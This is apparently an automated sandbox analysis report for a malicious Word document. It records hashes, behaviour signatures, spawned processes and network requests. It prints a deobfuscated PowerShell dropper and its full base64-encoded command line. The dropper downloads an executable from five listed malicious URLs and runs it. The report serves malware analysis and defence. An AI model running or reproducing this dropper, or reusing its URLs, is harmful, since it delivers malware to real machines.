Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
21/11/2024, 00:28 UTC
General
-
Target
f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0.doc
-
Size
168KB
-
MD5
75bd4b0063bd857bcab72e088adca30e
-
SHA1
585a121ffbab437dd9043b87e2ace950842e5a06
-
SHA256
f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0
-
SHA512
19b7666676481f8dd4edfd68f3b4b1df66536e6fd8e05ea5373c4375f00796dad8b2f8d1fa6d9ecb42bfacee8e0685b4845f937968fe32e9dd08d16e52cdd0ee
-
SSDEEP
3072:64PrXcuQuvpzm4bkiaMQgAlS8ll4TKCpJynpr7RT:7DRv1m4bnQgIS8lFnpr7RT
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
1
$daohjouthwoiz = "heamhep"
2
[net.servicepointmanager]::securityprotocol = "tls12, tls11, tls"
3
$kiodmoag = "851"
4
$xaitxaugvaexroich = "veepboofpooqu"
5
$jeolwaiqujoud = $env:userprofile + "\\" + $kiodmoag + ".exe"
6
$geucthaudgurheud = "boojhiltheib"
7
$keupfaikthuus = new-object net.webclient
8
$maogzoegchuuk = "http://houseofgriffin.org/weblog/v76/", "http://hohwy.com/cgi-bin/Bv8y33Cmr/", "http://lidermuebles.com.ar/cgi-bin/wz4rxd/", "http://106.52.87.250:81/wp-admin/T3B09Z/", "http://duhocjk.vn/wp-admin/51f73u/"
9
$cuudbuahdiom = "wowtiavnual"
10
foreach ($boinleerxun in $maogzoegchuuk) {
11
try {
12
$keupfaikthuus.downloadfile($boinleerxun, $jeolwaiqujoud)
13
$duawquootchiaw = "kiaflaidlaek"
14
if ((get-item $jeolwaiqujoud).length -ge 33618) {
15
([wmiclass]"win32_Process").create($jeolwaiqujoud)
16
$haucjaixkoawfeuj = "keojxuc"
17
break
18
$wianmachtocdooj = "geemlihzeab"
19
}
20
} catch {
URLs
exe.dropper
http://houseofgriffin.org/weblog/v76/
exe.dropper
http://hohwy.com/cgi-bin/Bv8y33Cmr/
exe.dropper
http://lidermuebles.com.ar/cgi-bin/wz4rxd/
exe.dropper
http://106.52.87.250:81/wp-admin/T3B09Z/
exe.dropper
http://duhocjk.vn/wp-admin/51f73u/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 5 IoCs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABkAGEAbwBoAGoAbwB1AHQAaAB3AG8AaQB6AD0AJwBoAGUAYQBtAGgAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBgAGkAVABZAFAAUgBgAG8AdABvAGMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAawBpAG8AZABtAG8AYQBnACAAPQAgACcAOAA1ADEAJwA7ACQAeABhAGkAdAB4AGEAdQBnAHYAYQBlAHgAcgBvAGkAYwBoAD0AJwB2AGUAZQBwAGIAbwBvAGYAcABvAG8AcQB1ACcAOwAkAGoAZQBvAGwAdwBhAGkAcQB1AGoAbwB1AGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGsAaQBvAGQAbQBvAGEAZwArACcALgBlAHgAZQAnADsAJABnAGUAdQBjAHQAaABhAHUAZABnAHUAcgBoAGUAdQBkAD0AJwBiAG8AbwBqAGgAaQBsAHQAaABlAGkAYgAnADsAJABrAGUAdQBwAGYAYQBpAGsAdABoAHUAdQBzAD0AJgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAEUAdAAuAFcAZQBCAEMAbABpAGUAbgBUADsAJABtAGEAbwBnAHoAbwBlAGcAYwBoAHUAdQBrAD0AJwBoAHQAdABwADoALwAvAGgAbwB1AHMAZQBvAGYAZwByAGkAZgBmAGkAbgAuAG8AcgBnAC8AdwBlAGIAbABvAGcALwB2ADcANgAvACoAaAB0AHQAcAA6AC8ALwBoAG8AaAB3AHkALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBCAHYAOAB5ADMAMwBDAG0AcgAvACoAaAB0AHQAcAA6AC8ALwBsAGkAZABlAHIAbQB1AGUAYgBsAGUAcwAuAGMAbwBtAC4AYQByAC8AYwBnAGkALQBiAGkAbgAvAHcAegA0AHIAeABkAC8AKgBoAHQAdABwADoALwAvADEAMAA2AC4ANQAyAC4AOAA3AC4AMgA1ADAAOgA4ADEALwB3AHAALQBhAGQAbQBpAG4ALwBUADMAQgAwADkAWgAvACoAaAB0AHQAcAA6AC8ALwBkAHUAaABvAGMAagBrAC4AdgBuAC8AdwBwAC0AYQBkAG0AaQBuAC8ANQAxAGYANwAzAHUALwAnAC4AIgBTAGAAcABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAGMAdQB1AGQAYgB1AGEAaABkAGkAbwBtAD0AJwB3AG8AdwB0AGkAYQB2AG4AdQBhAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAbwBpAG4AbABlAGUAcgB4AHUAbgAgAGkAbgAgACQAbQBhAG8AZwB6AG8AZQBnAGMAaAB1AHUAawApAHsAdAByAHkAewAkAGsAZQB1AHAAZgBhAGkAawB0AGgAdQB1AHMALgAiAEQAbwBgAHcAbgBsAGAAbwBhAGAAZABGAEkATABFACIAKAAkAGIAbwBpAG4AbABlAGUAcgB4AHUAbgAsACAAJABqAGUAbwBsAHcAYQBpAHEAdQBqAG8AdQBkACkAOwAkAGQAdQBhAHcAcQB1AG8AbwB0AGMAaABpAGEAdwA9ACcAawBpAGEAZgBsAGEAaQBkAGwAYQBlAGsAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABqAGUAbwBsAHcAYQBpAHEAdQBqAG8AdQBkACkALgAiAEwAYABFAG4AZwB0AGgAIgAgAC0AZwBlACAAMwAzADYAMQA4ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAZQBgAEEAdABlACIAKAAkAGoAZQBvAGwAdwBhAGkAcQB1AGoAbwB1AGQAKQA7ACQAaABhAHUAYwBqAGEAaQB4AGsAbwBhAHcAZgBlAHUAagA9ACcAawBlAG8AagB4AHUAYwAnADsAYgByAGUAYQBrADsAJAB3AGkAYQBuAG0AYQBjAGgAdABvAGMAZABvAG8AagA9ACcAZwBlAGUAbQBsAGkAaAB6AGUAYQBiACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHEAdQBhAGIAcQB1AGEAaQBjAGgAcABhAHcAPQAnAGIAbwBlAHgAdgBlAGEAeAB4AGkAeQAnAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
-
DNShouseofgriffin.orgRemote address:8.8.8.8:53Requesthouseofgriffin.orgIN AResponsehouseofgriffin.orgIN A74.114.89.87 -
GEThttp://houseofgriffin.org/weblog/v76/Remote address:74.114.89.87:80RequestGET /weblog/v76/ HTTP/1.1
Host: houseofgriffin.org
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Thu, 21 Nov 2024 00:28:50 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
TT-Server: t=1732148930595180 D=24839
Location: http://www.houseofgriffin.org/weblog/v76/
Content-Length: 0
Keep-Alive: timeout=10, max=20
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
DNSwww.houseofgriffin.orgRemote address:8.8.8.8:53Requestwww.houseofgriffin.orgIN AResponsewww.houseofgriffin.orgIN A74.114.89.87
-
GEThttp://www.houseofgriffin.org/weblog/v76/Remote address:74.114.89.87:80RequestGET /weblog/v76/ HTTP/1.1
Host: www.houseofgriffin.org
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Thu, 21 Nov 2024 00:28:51 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.houseofgriffin.org/wp-json/>; rel="https://api.w.org/"
TT-Server: t=1732148931019768 D=34652
Keep-Alive: timeout=10, max=20
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
DNShohwy.comRemote address:8.8.8.8:53Requesthohwy.comIN AResponsehohwy.comIN A81.169.145.77
-
GEThttp://hohwy.com/cgi-bin/Bv8y33Cmr/Remote address:81.169.145.77:80RequestGET /cgi-bin/Bv8y33Cmr/ HTTP/1.1
Host: hohwy.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 00:28:51 GMT
Server: Apache/2.4.62 (Unix)
Vary: User-Agent
Last-Modified: Wed, 27 Jul 2022 11:55:26 GMT
ETag: "128a-5e4c817b6c780"
Accept-Ranges: bytes
Content-Length: 4746
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html
-
DNSlidermuebles.com.arRemote address:8.8.8.8:53Requestlidermuebles.com.arIN AResponselidermuebles.com.arIN A172.67.194.140lidermuebles.com.arIN A104.21.92.141
-
GEThttp://lidermuebles.com.ar/cgi-bin/wz4rxd/Remote address:172.67.194.140:80RequestGET /cgi-bin/wz4rxd/ HTTP/1.1
Host: lidermuebles.com.ar
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Thu, 21 Nov 2024 00:28:51 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 21 Nov 2024 01:28:51 GMT
Location: https://lidermuebles.com.ar/cgi-bin/wz4rxd/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNYTa06kjEfMu9zGaJWYzEVf0m9tgVVwSDtukTnTrZbiJeCgbMisaJVmmxvX%2BooJS2%2BINYkWf1rd7C7XdZkg69RGhbNK%2FbSfXGe5onrwDaYf3FDIFlgdKDj2T8n%2FmcTdE%2BtIGcNQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5c8fe70d12ef2b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=39071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=84&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
-
GEThttps://lidermuebles.com.ar/cgi-bin/wz4rxd/Remote address:172.67.194.140:443RequestGET /cgi-bin/wz4rxd/ HTTP/1.1
Host: lidermuebles.com.ar
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Date: Thu, 21 Nov 2024 00:28:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding,Cookie,User-Agent
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://lidermuebles.com.ar/wp-json/>; rel="https://api.w.org/"
Location: https://lidermuebles.com.ar/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eM5ukKPeYbwsXc3AITazLVMVe5tXHQm7ilLiGX0N4Gn%2BLeznJLZx0AbqgrRVLAGJpXQme%2Bc8S9CYTVA%2FDpUoVUUBd7EceLcqQUssBOEsj9iYeIhSkBG6Me5bFRi5UW2R86gHN66l"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5c8fea6df97777-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=51542&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=374&delivery_rate=81238&cwnd=253&unsent_bytes=0&cid=4a2e65ab43fe9ee0&ts=1699&x=0"
-
GEThttps://lidermuebles.com.ar/Remote address:172.67.194.140:443RequestGET / HTTP/1.1
Host: lidermuebles.com.ar
ResponseHTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 00:28:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding,Cookie,User-Agent
Cache-Control: max-age=3, must-revalidate
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=983aaw2hCtTxrrAL%2FYYVCPrIKWWcbvv%2FdMQ9%2FeRUgnHJhG7gqC4pAznES%2FnShXiDmX9Q%2F%2Bm3FiIKLq%2FRwmyttCf9c9OCeyjTa5aW2VcmZ5cWmkNygkVnO1gJXimj1VfOMc7Lg7jV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5c8ff43d6e7777-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50158&sent=8&recv=7&lost=0&retrans=0&sent_bytes=3927&recv_bytes=459&delivery_rate=81238&cwnd=254&unsent_bytes=0&cid=4a2e65ab43fe9ee0&ts=1986&x=0"
-
74.114.89.87:80http://houseofgriffin.org/weblog/v76/http
HTTP Request
GET http://houseofgriffin.org/weblog/v76/HTTP Response
301 -
74.114.89.87:80http://www.houseofgriffin.org/weblog/v76/http
HTTP Request
GET http://www.houseofgriffin.org/weblog/v76/HTTP Response
404 -
81.169.145.77:80http://hohwy.com/cgi-bin/Bv8y33Cmr/http
HTTP Request
GET http://hohwy.com/cgi-bin/Bv8y33Cmr/HTTP Response
200 -
172.67.194.140:80http://lidermuebles.com.ar/cgi-bin/wz4rxd/http
HTTP Request
GET http://lidermuebles.com.ar/cgi-bin/wz4rxd/HTTP Response
301 -
172.67.194.140:443https://lidermuebles.com.ar/tls, http
HTTP Request
GET https://lidermuebles.com.ar/cgi-bin/wz4rxd/HTTP Response
302HTTP Request
GET https://lidermuebles.com.ar/HTTP Response
200
-
8.8.8.8:53houseofgriffin.orgdns
DNS Request
houseofgriffin.org
DNS Response
74.114.89.87
-
8.8.8.8:53www.houseofgriffin.orgdns
DNS Request
www.houseofgriffin.org
DNS Response
74.114.89.87
-
8.8.8.8:53hohwy.comdns
DNS Request
hohwy.com
DNS Response
81.169.145.77
-
8.8.8.8:53lidermuebles.com.ardns
DNS Request
lidermuebles.com.ar
DNS Response
172.67.194.140104.21.92.141
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB